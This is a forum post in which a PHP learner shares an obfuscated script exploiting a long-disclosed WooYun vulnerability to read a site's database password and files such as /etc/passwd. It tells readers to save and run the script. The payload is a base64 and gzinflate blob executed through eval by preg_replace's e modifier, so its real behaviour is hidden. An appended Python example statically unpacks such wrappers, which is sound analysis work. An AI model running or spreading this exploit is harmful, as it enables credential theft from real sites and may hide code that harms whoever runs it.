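A vulnerability that was disclosed on WooYun a long time ago; for details see http://www.wooyun.org/bugs/wooyun-2012-010072. I have recently been learning PHP, just so I can write a few small tools to play with, so I picked this simplest of vulnerabilities to practice on. I hope everyone will show plenty of support!!!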

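In fact, this vulnerability can also be used to read files such as /etc/passwd, so feel free to improvise. As a beginner I only know how to write something that reads the database password, so please just don't look down on me.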

The code is as follows; save it as *.php and run it:

<?php
$enfile="pVTNbxtFFL9b8v/wiKrsurF3vekHqY1blSg0B4os4RYQrqzx+O2HMp7Zzo6zTlH/GNRD1RugkEMitSU5UIE4UaiEyoUDl4ozCFSJN7tO2sTtgbKaw+x7v/cx7/feq1Yg1Yk0A+061cpS4z9+S9UKHH7d9e7q1Q8H1y/Ad8/v//rgt4On+892vnn0+drH3ZdQ735yZ3fn4ZPHXz/afg55nns5SwwTSqLH5Ztl4NTakITgnmI64vAOnKnBZ//3VdcyZBG2II1TcMAD63vz0+YNujoQq8xAykxcrazTtQWGtGggQ72JGtwk9S1EsjHWqpUuAVsFHIyyDvk4q1bWpmycitdFEIozUYTxSwP/zcmx5cFpYtpwG1BrpQcaU6VNIiP3bdKdKuJ0ZgkEN0hSJHsoWbaSiRYkcPxEjnDqUU6Xxh0qkebxIuukk6FI+IBKMMgmUYSZGWzgVq70aJHsOmzIF292PM+nwxmPMfO5kmESZf6IGTZkGVqPDoUhuUFps0nZllBs5NrIM35TjdFgzAyPXefI0nfqR2Y1S/xx5IAJQei+4/bzpVrfgc5FOPp52ZZuGrOJKJ0gjxU4P/+59/fBP3d2C3pKLVWj5GihLxfaM1zZ73O44CTux4O9u6/wt3wSd/AUYP/ZHO7MSdyXf3z7xZPdOdzZF7jblnOR4dGTfvjrp/tf7W3//viX7e/37+1sOxYTTiQ3iZLHi042kVBDJsoOqZdtQSTZ0hNDC1fWerBgQxftQiGLLoH1Xq/rB17Q10UKJdwjfDkrhbM5Hc2bblyOiIgWXFW3EiGYf85rgvsRdZzKM/igB+e9oA16sxWseM0aXEG+ofzlZtCkE8B7icZQTX2rnPN+mXNM7Zzi1PixGYs6S1NqWWZf7U+tZGl6UjoW7Zudpnehfto/XdxW5vyulr3T6G2lNMnHrBu02xqh0uMGFQUlVyMcvSavxvtMRpNi3dyKG1y+KozEgqEWrAqVoUUcosKUuAgzRdVIUbozrlaas6F5iwCWylGCrjNzZPdQMfRrdh3Y/UA9kOvEoEvoehnZboYh4xt27KlL8jgRSO5CVKFFFWNSAijFUKNtG2scNJfPlh65TbXAEm1oJlqWBlZ56WK18i8=";
$b=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef");
$g=str_replace('X','','gXXzXXiXXnXXXXfXXXlXXaXXXtXXXXXe');
preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'($g($b($enfile)))','a');
?>
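
A script shared in this form can be unpacked statically and read before anyone executes it. The following is an added example, not part of the original post: it resolves the str_replace() padding that hides the function names, checks the preg_replace() pattern for the e (eval) modifier, and inflates the blob as text without running it. The names triage and build_sample and the harmless sample payload are constructed for illustration.

```python
import base64
import re
import zlib

# $var = str_replace('pad', '', 'padded function name');
STR_REPLACE = re.compile(
    r"""\$(\w+)\s*=\s*str_replace\(\s*(['"])(.*?)\2\s*,\s*(['"])(.*?)\4\s*,\s*(['"])(.*?)\6\s*\)""")
# $var = "base64 literal";
B64_VAR = re.compile(r"""\$(\w+)\s*=\s*(['"])([A-Za-z0-9+/=]{16,})\2""")
# First string argument of preg_replace(), escaped quotes allowed inside it
PREG_ARG = re.compile(r"""preg_replace\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1""")

def triage(src: str) -> dict:
    """Statically unpack a str_replace/base64/gzinflate/eval chain. Nothing is executed."""
    # Undo the padding trick to recover the hidden function names.
    names = {m[1]: m[7].replace(m[3], m[5]) for m in STR_REPLACE.finditer(src)}
    # The e modifier makes preg_replace() evaluate its replacement as PHP code.
    eval_modifier = False
    for m in PREG_ARG.finditer(src):
        pat = re.sub(r"""\\([\\'"])""", r"\1", m[2])  # unescape \' \" \\
        if pat:
            close = {"(": ")", "[": "]", "{": "}", "<": ">"}.get(pat[0], pat[0])
            eval_modifier |= "e" in pat[pat.rfind(close) + 1:]
    # Only unpack blobs when the decode chain is really present.
    payloads = {}
    if {"base64_decode", "gzinflate"} <= set(names.values()):
        for m in B64_VAR.finditer(src):
            try:
                raw = base64.b64decode(m[3], validate=True)
                # gzinflate() reverses raw DEFLATE: wbits=-15, no zlib header
                payloads[m[1]] = zlib.decompress(raw, -15).decode("utf-8", "replace")
            except (ValueError, zlib.error):
                continue
    return {"names": names, "eval_modifier": eval_modifier, "payloads": payloads}

def build_sample(hidden: str) -> str:
    """Constructed stand-in with the same wrapper shape and a harmless payload."""
    c = zlib.compressobj(wbits=-15)
    blob = base64.b64encode(c.compress(hidden.encode()) + c.flush()).decode()
    return ("<?php\n$enfile=\"" + blob + "\";\n"
            "$b=str_replace('f','','bfafsfef6f4f_ffdffeffcffoffdffef');\n"
            "$g=str_replace('X','','gXXzXXiXXnXXXXfXXXlXXaXXXtXXXXXe');\n"
            r"preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'($g($b($enfile)))','a');")

if __name__ == "__main__":
    report = triage(build_sample("echo 'constructed harmless payload';"))
    for key, value in report.items():
        print(key, "=>", value)
```
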